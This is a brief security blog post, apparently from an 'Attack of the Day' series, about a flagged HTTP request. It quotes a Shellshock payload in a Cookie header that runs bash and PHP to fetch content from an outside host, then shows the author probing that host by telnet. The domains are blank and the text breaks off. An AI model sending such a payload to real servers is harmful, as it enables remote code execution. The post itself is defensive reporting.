Clever Domain Name

Posted Leave a commentPosted in Attack of the Day

Saw this get flagged on Friday. ¬†The domain “” showing up in a questionable HTTP request kind of indicates the owner really¬†thought through their plans. GET /cgi-sys/entropysearch.cgi HTTP/1.1 Content-Type: text/html Cookie: () { x;};echo;/bin/bash -c “php -r \”file_get_contents(‘’);\”” Host: Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/ Safari/525.19 X-Forwarded-For: A guy might be curious what lived at, I know I was. Lappy486:arf imhoff$ telnet 80 Trying… Connected to Escape character is ‘^]’. GET /hello/? HTTP/1.0 HTTP/1.1 […]